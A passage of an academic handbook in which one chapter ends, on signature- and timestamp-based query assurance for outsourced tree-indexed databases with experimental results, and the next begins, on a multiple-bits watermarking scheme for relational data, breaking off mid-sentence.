Completeness Guarantees Completeness guarantees mean that the server did not omit any tuples matching the query conditions. In our context, as a user asks the server for a redundancy set A of t nodes A={m1, ..., mt} and the server returns him a set R of t nodes R={n1, ..., nt}, the user must be able to verify that A=R. As presented in the previous section, a user asks for any encrypted nodes (at the server side) through their NIDs. Therefore, the user should be provided with a means of verifying that NID of each mi, i=1,t , equals NID of each corresponding ni, i=1,t . To ensure this, our solution is embarrassingly simple: an NID is encrypted with the corresponding node contents and this encrypted value is stored at the server side, together with its signature. Users can then check if the server returned the NIDs (in the redundancy set) that he or she did require (the completeness) as well as verify the query result correctness (as shown in the section, “Correctness Guarantees”). This idea is clearly illustrated in Figure 5. In more detail, Figure 5 sketches settings for verifying completeness (and correctness) guarantees of the system. First, the encrypted value with respect to the attribute EncryptedNode also includes the NID of its corresponding node (for example, in the first row, the encrypted value also includes value 0). Second, the data owner signs
Ensuring Correctness, Completeness, and Freshness for Outsourced Tree-Indexed Data
Figure 5. Settings for verifying completeness guarantees B+EncryptedTable
Including NIDs (encrypted with the corresponding node contents)
each encrypted node using the RSA signature scheme, then stores the signature (e.g., s0) together with the NID and its corresponding encrypted value as described in the previous section. Note that, however, verifying the completeness and the correctness must be carried out together⎯that is, the user cannot omit any of them and still be ensured that the other is also guaranteed. This is also true for freshness guarantees that we will present below.
Freshness Guarantees As discussed previously, with dynamic outsourced databases, ensuring only the correctness and completeness of the result set is not enough. Apart from those, the system must also provide a means for users to verify that the received nodes are from the most recent database state, not the older one(s). Either motivating by clear cost incentives for dishonest behavior or due to intrusions/viruses, the server may return users obsolete nodes, which do not truly reflect the state of the outsourced database at the querying time. This is not a less important problem that also needs to be sorted out to make the ODBS model viable. Narasimha and Tsudik (2006) mention this problem and outline a possible solution based on MHTs, but no cost evaluation is given. Note
Signatures to guarantee the correctness (Encrypted) NIDs to guarantee the completeness
that MHT-based approaches to the ODBS model are quite expensive, especially for dynamic outsourced tree-indexed data (Narasimha & Tsudik, 2006). In this section, we propose a vanguard solution to this problem, and a comprehensive evaluation for all concerned security objectives will be presented in the next section. To solve the problem of freshness guarantees, users must be able to verify that the server did return them the most up-to-date required tree nodes (at the time it processed the query). Our solution is also quite simple, but sound and complete, based on timestamps: A timestamp of each child node is stored at its parent node. This timestamp changes only as the child node contents (but not its address) are updated. In other words, a node keeps timestamps of all of its child nodes, and a user can then check (from the root node) if the server returned him the latest version of the required node as follows: In accessing the root, the user knows in advance all timestamps of its child nodes, and as a child node is returned, he or she can check if this node’s timestamp equals the known value, and so on. This process is carried out for every tree node required by the user. There is, however, one question that arises: How can users check the root’s timestamp? The answer to this question is not complicated: In the settings for access redundancy and node-swapping
2215
Ensuring Correctness, Completeness, and Freshness for Outsourced Tree-Indexed Data
Figure 6. Settings for verifying freshness guarantees B+EncryptedTable
Including NIDs and timestamps (of the child nodes)
techniques, there is a special node called SNODE that keeps some metadata and the root’s address (see the previous section). The SNODE’s address and its decryption key are known to all qualified users. Besides, in the context of our concerned ODBS model, only data owners are able to make changes to, as well as to query, their outsourced data. Therefore, for the sake of freshness guarantees, SNODE will keep the timestamp of the root in addition to other information as mentioned before (this timestamp changes only as the root contents are updated by a data owner), and each qualified user (i.e., other data owners) is informed about the timestamp of SNODE (by the data owner who made the changes6). Moreover, with the settings for access redundancy and node-swapping techniques, besides the root’s address and timestamp, the users must also use other metadata in the SNODE for performing operations on the tree (see Dang, 2006a, for detailed discussions about the outsourced tree operations). Hence, it is vitally important that the SNODE’s timestamp is communicated to all users as discussed above to ensure the freshness of the result set. Overall, with all of these above settings, all the three security objectives of the query assurance problem in the concerned ODBS model⎯that is, the correctness, completeness, and freshness
2216
Signatures to guarantee the correctness (Encrypted) NIDs to guarantee the completeness (Encrypted) timestamps to guarantee the freshness
guarantees of the query result⎯can be effectively verified. Note that the encrypted value representing the corresponding node contents now includes not only its NID, but also timestamps of the child nodes. The corresponding signature is computed based on this final encrypted value. This is clearly illustrated in Figure 6.
EXPERIMENTAL RESULTS To confirm theoretical analyses carried out in previous sections and establish the practical applicability of our approach, we implemented a prototype system and evaluated the proposed solutions with real datasets. For all experiments, we used two-dimensional datasets, which were extracted from the SEQUOIA dataset at http:// www.rtreeportal.org/spatial.html. The SEQUOIA dataset consists of two-dimensional points of the format (x, y), representing locations of 62,556 California place names. We extracted five subdatasets of 10K, 20K, 30K, 40K, and 50K points from the SEQUOIA dataset for experiments. To manage the spatial points, we employed two-dimensional kd-trees due to its simplicity. For all the trees, we set the maximum number M of data items that a leaf node can keep to 50 and
Ensuring Correctness, Completeness, and Freshness for Outsourced Tree-Indexed Data
Figure 7. A screen shot: Costs of point and range queries with condensed-RSA scheme wrt. 50K points dataset
the minimum fill factor value to 4%. This means that each tree leaf node must contain at least two points and can store up to 50 points. Furthermore, the tree was stored in a data storage space with 22,500-node capacity (see Figure 7), divided into 15 levels of 1,500 nodes each (see Dang, 2006a; Lin & Candan, 2004, for detailed meanings of these settings). Our prototype system consisted of only one P4 CPU 2.8GHz/1GB RAM PC running a Windows 2003 server. Both user and server were accommodated in the same computer, so for all experiments, we will report average time to complete a user request, which can represent the average CPU cost of each user request and analyze averaged IO and communication cost. In addition, all programs were implemented using C#/Visual Studio .NET 2003, and we employed the DES algorithm for the encryption of data and the RSA signature scheme (1024 bits key) with SHA-1 hashing for the digital signatures. We did experiments with all major basic operations, including search (for both point and range queries) and updates (inserts and deletes). Note
that modify operations are combinations of inserts and deletes (Dang, 2005, 2006a). In addition, because there is no previous work built on the same or similar scheme and addressing the same problem, we had to build our scheme from scratch and did experiments to evaluate our solutions to the query assurance issue on the basis of the condensed-RSA signature scheme and the naive/standard RSA signature scheme. All the security objectives of the query assurance issue (i.e., correctness, completeness, and freshness guarantees) were taken into account. The details are as follows. Initially, we did experiments with the largest dataset, 50K points, for insert, delete, point, and range queries in order to see the performance of both naive and condensed RSA-based solutions. The redundancy set size is set to 4 for the tests. Figure 7 shows a screen shot as we built the tree, stored it to the server, and performed point and range queries with condensed-RSA scheme wrt. the largest dataset. In Figure 8, we present the experimental results concerning the CPU cost for all operations. It is clearly shown that the
2217
Ensuring Correctness, Completeness, and Freshness for Outsourced Tree-Indexed Data
condensed-RSA scheme CPU cost is much better than that of the naïve-RSA scheme. Note that the average accessed node number (i.e., the IO cost) of the two is the same, but the communication cost of the condensed-RSA scheme is also better by a factor of (Redundancy_set_size -1) * RSA_signature_size. This is due to the fact that as with the condensed-RSA scheme, the server has to send the user only one condensed signature, while it has to send Redundancy_set_size
2218
signatures with respect to the naïve-RSA scheme. Verifying more signatures is the main reason for a higher CPU cost of the latter. Furthermore, to see the effect of different database sizes on the performance for each sub-dataset, we ran 100 separate queries with the redundancy set size being set to 4, and calculated averaged values for CPU time. With inserts, deletes, and point queries, we randomly chose 100 points from the corresponding dataset as the queries. With
Ensuring Correctness, Completeness, and Freshness for Outsourced Tree-Indexed Data
range queries, we randomly chose 100 squares as the queries. The sides of each square were chosen to be 1% of the norm of the data space side (if the dataset is uniformly distributed, this value maintains the selectivity of 0.01% for these range queries).The experimental results are shown in Figure 9. As we can see, the CPU cost saving of all kinds of queries is high, over 30% at the minimum between the condensed-RSA scheme and the naïve-RSA scheme. Again, as mentioned above, although the average accessed node number is equal for both schemes, the communication cost of the condensed-RSA scheme is better than that of the naïve-RSA scheme.
Security Analysis Briefings The security correctness of our proposed solutions to all the three security objectives in our holistic approach to the query assurance problem in the ODBS model is obvious and can be understood from discussions and analyses in previous sections. However, one may question the security degree of access redundancy and node-swapping techniques introduced in Lin and Candan (2004) and their modified versions for dynamic outsourced search trees (Dang, 2005, 2006a). The proof of the security correctness is therefore focused on that of the previous work. Fortunately, Dang (2006a) and Lin and Candan (2004) did prove that when users access the outsourced tree-indexed data, the untrusted server is not able to determine if any two queries are identical and, for two different queries, it is also not able to differentiate the distribution of the queries’ redundancy sets in polynomial time. The former is to protect queries from the server and the latter aims to protect the tree structure. In summary, to conclude this section we emphasize that it has been mathematically proven in Lin and Candan (2004) and Dang (2006a) that our approach, based on the access redundancy and node-swapping techniques, is computationally secure to protect both queries and the tree structure from a polynomial time server.
Hence, it is quite safe to claim that our proposed solutions in this article, which have extended the previous work, become full-fledged and can be applied to real-world ODBS models.
CONCLUSION AND FUTURE WORK In this article, we explored the problem of query assurance in the oursourced database service (ODBS) model. Concretely, we extended our previous work (Dang, 2006a) and presented a full-fledged solution to the problem of ensuring the correctness, completeness, and freshness for basic operations (insert, delete, modify, point, and range queries) on dynamic outsourced treeindexed data. Experimental results with real multidimensional datasets have confirmed the efficiency of our proposed solution. Notably, to the best of our knowledge, none of the previous work has dealt with all the three above security issues of query assurance in the ODBS model with respect to dynamic outsourced trees. Our work therefore provides a vanguard solution for this problem. Also, this work can also be applied to non-tree-indexed data outsourced to untrusted servers (with settings like those of Damiani et al., 2003; Dang, 2006a). Our future work will focus on evaluating the efficiency of the proposed solutions in real-world applications and on addressing related open research issues. Specially, supporting multiple data owners’ signatures (i.e., multiple signers) is a generalization of the proposed solution in this article. An efficient solution to this problem is still open. Moreover, as discussed in the section “Related Work,” auditing and accountability for the ODBS model, as well as computer criminalrelated issues and the data privacy problem, should be addressed, and they will be among our future research activities of great interest. Another problem also attracts us: how to deal with the problem of over redundancy of the result set returned from the server⎯that is, the
2219
Ensuring Correctness, Completeness, and Freshness for Outsourced Tree-Indexed Data
server sends the user more than what should be returned in the answers. This may cause a user to pay more for the communication cost, to incur higher computation costs, and so this issue needs to be investigated carefully.
Chor, B., Goldreich, O., Kushilevitz, E., & Sudan, M. (1995). Private information retrieval. Proceedings of the 36th Annual IEEE Symposium on Foundations of Computer Science (pp. 41-50), Milwaukee, WI.
ACKNOWLEDGMENT
Chang, Y.-C., & Mitzenmacher, M. (2004). Privacy preserving keyword searches on remote encrypted data. Cryptology ePrint Archive Report 2004/051.
The author would like to thank the anonymous referees for their insightful reviews with interesting comments and suggestions.
REFERENCES Asonov, D. (2001). Private information retrieval: An overview and current trends. Proceedings of the ECDPvA Workshop (pp. 889-894), Vienna, Austria. Axelrod, C.W. (2004). Outsourcing information security. Norwood, MA: Artech House. Burmester, M., Desmedt, Y., Wright, R.N., & Yasinsac, A. (2004). Accountable privacy. Proceedings of the 12th International Workshop on Security Protocols (pp. 83-95), Cambridge, UK. Boneh, D., Gentry, C., Lynn, B., & Shacham, H. (2003). Aggregate and verifiably encrypted signatures from bilinear maps. Proceedings of the International Conference on the Theory and Applications of Cryptographic Techniques (pp. 416-432), Warsaw, Poland. Bouganim, L., & Pucheral, P. (2002). Chip-secured data access: Confidential data on untrusted servers. Proceedings of the 28th International Conference on Very Large Data Bases (pp. 131142), Hong Kong. Castano, S., Fugini, M.G., Martella, G., & Samarati, P. (1995). Database security. Boston: Addison-Wesley/ACM Press.
2220
Dang, T.K. (2003). Semantic based similarity searches in database systems: Multidimensional access methods, similarity search algorithms. PhD Thesis, FAW-Institute, University of Linz, Austria. Dang, T.K. (2005). Privacy-Preserving basic operations on outsourced search trees. Proceedings of the IEEE International Workshop on Privacy Data Management, Tokyo. Dang, T.K. (2006a). A practical solution to supporting oblivious basic operations on dynamic outsourced search trees. International Journal of Computer Systems Science and Engineering, 21(1), 53-64. Dang, T.K. (2006b). Security protocols for outsourcing database services. Information and Security: An International Journal, 18, 85-108. Du, W., & Atallah, M.J. (2000). Protocols for secure remote database access with approximate matching. Proceedings of the 7th ACM Conference on Computer and Communications Security, 1st Workshop on Security and Privacy in E-Commerce, Greece. Damiani, E., Vimercati, S.D.C., Jajodia, S., Paraboschi, S., & Samarati, P. (2003). Balancing confidentiality and efficiency in untrusted relational DBMSs. Proceedings of the 10th ACM Conference on Computer and Communication Security (pp. 93-102), Washington, DC.
Ensuring Correctness, Completeness, and Freshness for Outsourced Tree-Indexed Data
Fong, K.C.K. (2003). Potential security holes in Hacigümüs’ scheme of executing SQL over encrypted data. Retrieved from http://www.cs.siu. edu/~kfong/research/database.pdf Gertner, Y., Ishai, Y., Kushilevitz, E., & Malkin, T. (1998). Protecting data privacy in private information retrieval schemes. Proceedings of the 30th Annual ACM Symposium on Theory of Computing (pp. 151-160). Hacigümüs, H., Iyer, B.R., Li, C., & Mehrotra, S. (2002a). Executing SQL over encrypted data in the database-service-provider model. Proceedings of the ACM SIGMOD Conference (pp. 216-227), Madison, WI. Hacigümüs, H., Mehrotra, S., & Iyer, B.R. (2002b). Providing database as a service. Proceedings of the 18th International Conference on Data Engineering (pp. 29-40), San Jose, CA. Joux, A., & Nguyen, K. (2001). Separating decision Diffie-Hellman from Diffie-Hellman in cryptographic groups. Cryptology ePrint Archive Report 2001/003. Lin, P., & Candan, K.S. (2004). Hiding traversal of tree structured data from untrusted data stores. Proceedings of the 2nd International Workshop on Security in Information Systems (pp. 314-323), Porto, Portugal. Merkle, R.C. (1980). Protocols for public keys cryptosystems. Proceedings of the IEEE Symposium on Research in Security and Privacy (pp. 122-134), Oakland, CA. Mykletun, E., Narasimha, M., & Tsudik, G. (2004). Authentication and integrity in outsourced databases. Proceedings of the 11th Annual Network and Distributed System Security Symposium, San Diego, CA. Narasimha, M., & Tsudik, G. (2006). Authentication of outsourced databases using signature aggregation and chaining. Proceedings of the
11th International Conference on Database Systems for Advanced Applications (pp. 420-436), Singapore. Nguyen, V.H., Dang T.K., Son, N.T., & Kueng, J. (2007). Query assurance verification for dynamic outsourced XML databases. Proceedings of the International Symposium on Frontiers in Availability, Reliability and Security (FARES) (pp. 689-696), Vienna, Austria. Pang, H.H., & Tan, K-L. (2004). Authenticating query results in edge computing. Proceedings of the 20th International Conference on Data Engineering (pp. 560-571), Boston. Pang, H.H, Jain, A., Ramamritham, K., & Tan, K-L. (2005). Verifying completeness of relational query results in data publishing. Proceedings of the SIGMOD Conference (pp. 407-418). PRIME Project. (2004). The PRIME Project: Privacy and identity management for Europe. Retrieved from https://www.prime-project.eu Sion, R. (2005). Query execution assurance for outsourced databases. Proceedings of the 31st International Conference on Very Large Data Bases (pp. 601-612), Trondheim, Norway. Smith, S.W., & Safford, D. (2001). Practical server privacy with secure coprocessors. IBM Systems Journal, 40(3), 683-695. Thuraisingham, B. (2005). Database and applications security: Integrating information security and data management. Auerbach. Umar, A. (2004). Information security and auditing in the digital age: A managerial and practical perspective. NGE Solutions.
ENDNOTES 1
In this article, however, we will deal with a less complicated ODBS model.
2221
Ensuring Correctness, Completeness, and Freshness for Outsourced Tree-Indexed Data
2
3
Note that, although privacy-related issues have been widely investigated (PRIME Project, 2004), the question “what is the complexity of the privacy problem?” is still open inasmuch as the answer is quite different, depending not only on technology, but also on sociology and politics (Thuraisingham, 2005). In one of our very recent papers (Nguyen et al., 2007), which was written and published after this article had been accepted for publication, we also employed the timestamps as proposed in this article in order to ensure
4
5
6
the query result freshness of dynamic outsourced XML databases. Note that Figure 4 depicts only “real” tree nodes, but the empty nodes that are not shown here are also stored in the same table, EncryptedTable, over the same schema at the server side (see Dang, 2006a, for more information). Here, in the unified user model, a user is also one of the data owners. Obviously, the data owner knows who the valid users/other data owners are, and so this solution is well applicable.
This work was previously published in Information Resources Management Journal, Vol. 21, Issue 1, edited by M. KhosrowPour, pp. 59-76, copyright 2008 by IGI Publishing (an imprint of IGI Global).
2222
2223
Chapter 7.16
A Multiple-Bits Watermark for Relational Data Yingjiu Li Singapore Management University, Singapore Huiping Guo California State University at Los Angeles, USA Shuhong Wang University of Wollongong, Australia
ABSTRACT At the heart of the information economy, commercially and publicly useful databases must be sufficiently protected from pirated copying. Complementary to the Database Protection Act, database watermarking techniques are designed to thwart pirated copying by embedding ownerspecific information into databases so that the ownership of pirated copies of protected databases can be claimed if the embedded information is detected. This article presents a robust watermarking scheme for embedding a multiple-bits watermark to numerical attributes in database relations. The scheme is robust in the sense that it provides an upper bound for the probability that a valid watermark is detected from unmarked data, or a fictitious secret key is discovered from
pirated data. This upper bound is independent of the size of the data. The scheme is extended to database relations without primary-key attributes to thwart attribute-related attacks. The scheme is also extended to multiple watermarks for defending additive attacks and for proving joint ownership.
INTRODUCTION With the development of information technology, databases are becoming increasingly important in a wide variety of applications such as parametric specifications, surveys, and life sciences. While demand for the use of databases is growing, pirated copying has become a severe threat to such databases due to the low cost of copying and
the high values of the target databases. To fight against pirated copying, database watermarking techniques are designed to embed owner-specific information into database relations; when a pirated copy is found, the owner can extract the embedded information and use the detection process to assert the ownership of data. This complements the effort of the Database Protection Act (Vaas, 2003) as people realize that the law does not provide sufficient protection to valuable databases (Gray & Gorelick, 2004). While watermarking multimedia data has long been rigorously studied (Cox, Miller, & Bloom, 2001; Johnson, Duric, & Jajodia, 2000; Katzenbeisser & Petitcolas, 2000), the approaches developed for multimedia watermarking cannot be directly applied to databases because of the difference in data properties. In general, database relations differ from multimedia data in significant ways and hence require a different class of information-hiding mechanisms. Unlike multimedia data whose components are highly correlated, database relations consist of independent objects or tuples. The tuples can be added, deleted, or modified frequently in either benign updates or malicious attacks. No existing watermarking techniques for multimedia data are designed to accommodate such tuple operations. Perhaps the most well-known scheme for watermarking relational data is the one proposed by Agrawal and Kiernan (2002). For convenience, we call it the AK scheme. The main idea of the AK scheme is to change a small portion of numerical data according to a secret key such that the change can be detected for ownership proof. Without access to the secret key, a pirate cannot localize exactly where the change is made. It is difficult for a pirate to confuse the ownership detection unless he or she introduces an intolerable error to the underlying data. The AK scheme can be used in many real-world applications such as watermarking parametric specifications, surveys, and life-science data (Agrawal, Haas, & Kiernan, 2003; Agrawal & Kiernan).
2224
Consider a database relation R that has a primary key P and ν numerical attributes A0,..., Aν–1. Let there be η tuples. A portion of tuples is selected for embedding watermark information according to a control parameter γ (γ < η). The selection is also determined by a secret key K, known only to the owner of the data, as well as the primary key. Any tuple r is selected if S1(K, r.P) mod γ = 0, where S1(K, r.P) is the first number generated by S(K, r.P), and S(K, r.P) is a cryptographic pseudorandom sequence generator seeded with a secret key K and the primary key r.P of tuple r. Given a sequence of numbers S1, S2,... generated by S, it is computationally infeasible to derive the secret key or to predict the next number in the sequence. Due to the uniqueness of the primary key, roughly one out of every γ tuples is selected for embedding watermark information. For each selected tuple r, the AK scheme selects exactly one least significant bit j from attribute Ai and replaces it with a mark bit x, where i= S2(K, r.P) mod ν, j= S3(K, r.P) mod ξ, and x=0 if S4(K, r.P) is even and x=1, otherwise. Here, ξ is another control parameter determining the range of least-significant bits of each value that may be modified. For ownership detection, the mark bits are located using the same process provided that the secret key is known and the primary key remains unchanged. Let ω be the number of mark bits being localized (ω ≈ η/ϕ). To increase the robustness of the detection process, the ownership is claimed if more than τω of the localized bits are as expected, where τ ∈ [0.5, 1) is a control parameter that is related to the assurance of the detection process. The AK scheme has the following advantages: It is (a) key based, meaning all aspects of the scheme are determined by a secret key and a primary key, (b) blind, that is, the detection process does not require the knowledge of the original database or the embedded information, (c) incrementally updatable, where each tuple is marked independently of all other tuples, (d)
A Multiple-Bits Watermark for Relational Data
error tolerable, meaning the error introduced by embedding mark bits can be controlled such that its impact on the mean and variance of marked attributes is minuscule, and (e) robust, where the detection process is robust to a variety of attacks including bit-flipping attacks, mix-and-match attacks, additive attacks, and invertibility attacks. In particular, the scheme is robust against tuple-related attacks such as tuple modification, deletion, and insertion. To motivate our research, we examine the following assumptions that are used in the AK scheme: •
•
•
Error tolerance: A database relation being watermarked consists of a number of numeric attributes. It is acceptable to change a small number of ξ least-significant bits in some numeric values; however, the value of data will be degraded significantly if all or a large number of such bits change. Primary-key criticality: A database relation being watermarked has a primary-key attribute that either does not change or can be recovered. The primary-key attribute contains essential information such that modification or deletion of this information will substantially reduce the value of data. Attribute order dependence: A database relation being watermarked has a fixed order of attributes that either does not change or can be recovered. This assumption is implicit in Agrawal and Kiernan (2002).
The scheme depends critically on a primary key and the original order of database attributes. The scheme does not apply if the data have no primary-key attribute or if either the primary key or the order of attributes is modified. The scheme is therefore not robust against attribute-related attacks such as attribute deletion and insertion. In this article, we present the view that the AK scheme actually embeds a 1-bit watermark, and we extend it to a multiple-bit watermark. The extended scheme provides an upper bound for the probability that a valid watermark is detected from unmarked data, or a fictitious secret key is discovered from pirated data. This upper bound is independent of the size of the data. Then we drop the assumptions for primary-key criticality and attribute order dependence by constructing a virtual primary key from some most-significant bits of some selected attributes. The attributes used for constructing the virtual primary key may vary from tuple to tuple, and the scheme does not depend on a priori ordering over the attributes. Our extended scheme is robust against not only tuple-related attacks, but also attribute-related ones. We also extend our scheme for embedding and detecting multiple watermarks so as to thwart additive attacks or prove joint ownership. As a result of our study, ownership detection can be fully automated for detecting any database relations with a guarantee of low false-detection rates. The remainder of this article is organized as follows. We first present a multiple-bits watermarking scheme for relational data. We then
Table 1. Notation in watermarking η
Number of tuples that can be used in watermarking
ν
Number of numerical attributes that can be used in watermarking
ξ
Number of least-significant bits available in each value for watermarking
1/γ
Fraction of tuples that are used for watermarking
K
Secret key
S
Cryptographic pseudorandom sequence generator
τ
Threshold in watermark detection
2225
A Multiple-Bits Watermark for Relational Data
extend it by removing the assumptions on the primary key and attribute order. We also extend our scheme to multiple watermarks. In the related-work section, we compare our work with many other solutions including newly published ones. The final section presents our conclusion. For ease of reference, Table 1 gives the notation that is used in this article.
RELATED WORK In this section, we summarize the related work in three categories: robust watermarking, fragile watermarking, and public watermarking.
Robust Watermarking Recent development of watermarking techniques has been targeted on relational databases to accommodate typical database operations such as tuple insertion, deletion, and modification. The AK scheme (Agrawal & Kiernan, 2002) is a typical robust watermarking scheme that embeds a single-bit watermark to relational data. The scheme alters some least-significant bits in numerical attributes such that the alteration does not degrade the data beyond their usability and that the pattern of alteration can be detected even if the data have been modified. In this article, we extend the AK scheme to (a) allow multiple-bit information to be embedded and detected, (b) provide an upper bound for the probability that a valid watermark is detected from unmarked data, or a fictitious secret key is discovered from pirated data, regardless of the size of data, (c) deal with database relations without primary-key attributes, and (d) embed and detect multiple watermarks for thwarting additive attacks and for proving joint ownership. Parallel to our work, a multibit watermark scheme was proposed by Sion, Atallah, and Prabhakar (2003). The scheme is designed primarily for watermarking a set of real numbers {x1,..., xn}
2226
by manipulating its distributions. The first step of watermark insertion is to sort the values according to a cryptographically keyed hash of the set of most-significant bits of the normalized values. Then, a maximum number of nonintersecting subsets of values are formed, where each subset consists of a certain number of adjacent items after sorting. Embedding a watermark bit into a subset is achieved by making minor changes to some of the data values in this subset such that the number of values that are outliers in the distribution is less than a smaller threshold (for watermark bit 0) or greater than a larger threshold (for watermark bit 1). Note that some of the groups may not be able to be watermarked given userspecified change tolerance. Also note that some redundant bits must be embedded such that the original multibit watermark can be recovered in watermark detection even if some of the encoded bits are destroyed in data attacks. Compared with our multibit watermarking scheme, this scheme is robust against linear transformation and does not depend on the existence of a primary key. On the other hand, since it requires sorting, grouping, and distribution manipulating, it incurs more watermarking overhead, especially expensive for watermarking large data sets or frequently updated databases. Robust watermarking schemes have also been developed for protecting copyrights for categorical data, XML (extensible markup language) data, and data cubes. In Sion (2004), the author proposed to watermark a categorical attribute by changing some of its values to other values of the attribute (e.g., red is changed to green) if such change is tolerable in certain applications. Sion’s scheme is equivalent to the AK scheme in selecting a number of tuples for watermarking a categorical attribute A based on a secret key K and the primary-key attribute P. For each selected tuple r, exactly one bit is chosen from watermark information wm_data and is embedded to r.A, where the watermark information wm_data is generated from a shorter watermark wm using the
A Multiple-Bits Watermark for Relational Data
error-correcting code (ECC). The bit position is determined by a pseudorandom value generated from the secret key and the primary key r.P. To embed the chosen bit b, the current categorical value r.A is changed to another valid value of A, which is chosen from a list LA of all valid values of A. In this process, any value a can be chosen from LA (to replace r.A) as long as a’s index in LA has the least-significant bit b. For watermark detection, a number of tuples are selected the same way as in watermark insertion. Then, for each selected tuple r, a bit position in wm_data is located and the corresponding bit value in wm_data is extracted from the least-significant bit of the index of r.A in the list LA. After all of the tuples are processed, the ECC takes as input wm_data and produces the corresponding wm. The ECC can tolerate certain errors in detecting wm_data and still produce the same wm in watermark detection. This scheme has been extended to protect the ownership and privacy of outsourced medical data (Bertino, Ooi, Yang, & Deng, 2005) that are subject to generalization (Kim, Sengupta, Fox, & Dalkilic, 2007) and aggregation (Woo, Lee, Lee, Loh, & Whang, 2007) attacks. The AK scheme has also been extended by Ng and Lau (2005) to watermarking XML data. In this scheme, the owner of XML data is required to choose locators, which are XML elements having unique values that can serve as primary keys as in the AK scheme. While a textual value of an element is selected to embed a mark bit, one of its words is replaced by a synonym function based on a well-known synonym database WordNet. Gross-Amblard (2003) considered relational or XML data that are only partially accessible through a set of parametric queries in his querypreserving watermarking scheme. The scheme modifies some numerical values in watermark insertion in a way that the distortions introduced to the results of those parametric queries are small and that the watermark can be detected from the results of those queries. Another work on watermarking XML data was conducted by Zhou,
Pang, and Tan (2007). They proposed creating queries to identify the data elements in XML data that can be used for embedding watermarks. The identifying queries are resilient against data reorganization and redundancy removal through query rewriting. If an identified element is a leaf node, watermark insertion is performed by modifying its value; otherwise, it is performed by adding to or deleting its child nodes. The usability of XML data is measured by query templates. The results of certain basic queries on the data remain useful after watermarking or attacks. J. Guo, Li, Deng, and Chen (2006) proposed a robust watermarking scheme to protect the owner’s rights in data-cube applications. The basic assumption is that all values able to be watermarked in a data cube are numeric, and those small changes in a small portion of these values are acceptable. For each cell in a data cube, the owner of the data seeds a cryptographically secure pseudorandom sequence generator S with a secret key K in concatenation with the cell’s feature attributes. A small portion of cells are selected and for each selected cell, a bit position among ξ least-significant bits is selected to embed a mark bit in the same way as in the AK scheme. Since the most prevalent data-cube operations are aggregation queries (Pears & Houliston, 2007), a minicube is constructed for each cell that is modified in watermark insertion so as to eliminate the errors introduced by watermarking to aggregation queries. J. Guo et al. have shown that this can be done effectively and efficiently in real-world applications even for very large data cubes. The AK scheme has also been extended to fingerprinting relational databases (Li, Swarup, & Jajodia, 2005). Fingerprinting is used to insert digital marks for the purpose of identifying the recipients who have been provided data, which is different from watermarking in which digital marks are inserted for the purpose of identifying the source of data. The challenge is to address the collusion attack in which a group of legitimate users work collaboratively to create a pirated copy
2227
A Multiple-Bits Watermark for Relational Data
of protected data (Boneh & Shaw, 1995, 1998; Safavi-Naini & Wang, 2001).
Fragile Watermarking Different from robust watermarking, the purpose of fragile watermarking is not to protect copyright, but to detect and localize possible attacks that modify a distributed or published database. Li, Guo, and Jajodia’s scheme (2004) is an example of fragile watermarking. This scheme embeds a watermark to relational data by partitioning the tuples into groups and manipulating the order of the tuples in each group, where the grouping and ordering of the tuples are determined by a secret key and the primary key of the tuples. A watermark can be computed by hashing or signing all tuple values in a group. Note that even though the watermark can be derived from a digital signature, it is embedded into the data, which is different from integrating digital signatures with relational databases (Reid & Dhillon, 2003). Any change to the underlying data can be detected at a group level with a high probability in watermark detection. This solution introduces no error to the underlying data and can be easily extended to watermarking multidimensional data cubes. To improve the precision in tamper localization, H. Guo, Li, Liu, and Jajodia (2006) proposed another fragile watermarking scheme under the assumptions that the database relation to be watermarked has numerical attributes and that the errors introduced in two least-significant bits of each value can be tolerated. In this solution, the tuples are first divided into groups, as in the previous scheme. Within each group, a tuple hash (keyed) is computed for each tuple (with attributes organized in a fixed order), and an attribute hash (keyed) is computed for each attribute (with tuples organized in a fixed order). When these hash values are computed, the two least-significant bits of all attribute values are ignored. Each tuple hash is embedded into the corresponding tuple and each attribute hash into the corresponding at-
2228
tribute. The embedded hash values actually form a watermark grid, which helps to detect, localize, and characterize database attacks. Recently, H. Guo, Li, and Jajodia (2007) proposed a fragile watermarking scheme for detecting malicious modifications to streaming data. The scheme partitions a numerical data stream into groups based on synchronization points. A data element xi is defined to be a synchronization point if its keyed hash HMAC(K, xi) mod m=0, where K is a secret key, and m is a secret parameter. For each group of data that falls between two synchronization points, the scheme computes and embeds a fragile watermark so that any modification to the data can be detected and localized at a group level in watermark detection.
Public Watermarking One common feature of most robust watermarking techniques is that they are secret-key based, where ownership is proven through the knowledge of a secret key that is used for both watermark insertion and detection. The secret-key-based approach is not suitable for proving ownership to the public (e.g., in a court). To prove ownership of suspicious data, the owner has to reveal his or her secret key to the public for watermark detection. After being used one time, the key is no longer secret. With access to the key, a pirate can invalidate watermark detection by either removing watermarks from protected data or adding a false watermark to nonwatermarked data. Li and Deng (2006) proposed a unique database watermarking scheme that can be used for publicly verifiable ownership protection. Given a database relation to be published or distributed, the owner of the data uses a public watermark key to generate a public watermark, which is a relation with binary attributes that are derived from the original database. Anyone can use the watermark key and the watermark to check whether a suspicious copy of the data is watermarked, and, if so, prove the ownership
A Multiple-Bits Watermark for Relational Data
of the data by checking a watermark certificate officially signed by a trusted certificate authority, DB-CA. The watermark certificate contains the owner’s ID, the watermark key, the hashes of the watermark and database relation, the first time the relation was certified, the validity period of the current certificate, and the DB-CA’s signature. The watermark certificate may be revoked and recertified in the case of identity change, ownership change, DB-CA compromise, or data update. Therefore, the revocation status also needs to be checked in proving the ownership.
EMBEDDING AND DETECTING MULTIPLE-BITS WATERMARK In this section, we extend the AK scheme under the same set of assumptions: error tolerance, primary-key criticality, and attribute order dependence. The extended scheme is used for embedding a multiple-bits watermark rather than a 1-bit watermark as in the AK scheme. Multiplebits watermarks are useful for embedding owner information such as name, logo, signature, or description about the underlying data. We prove that certain false-detection rates are bounded in our extended scheme.
Embedding Multiple Bits The AK scheme embeds a 1-bit watermark only. This can be seen clearly by extending it to embedding a multiple-bits watermark W = (w0,..., wL−1). To embed W, the same scheme is used to (a) select some tuples, (b) select one attribute for each selected tuple r, (c) select one least significant bit for each selected attribute, and (d) compute a mark bit x for each selected bit. Now the difference is that the mark bit is not used to replace the selected bit in data directly; instead, one watermark bit wl is selected from W where l= S5(K, r.P) mod L, and x XOR wl is used to replace the selected bit in the data. In watermark detection, the watermark bit
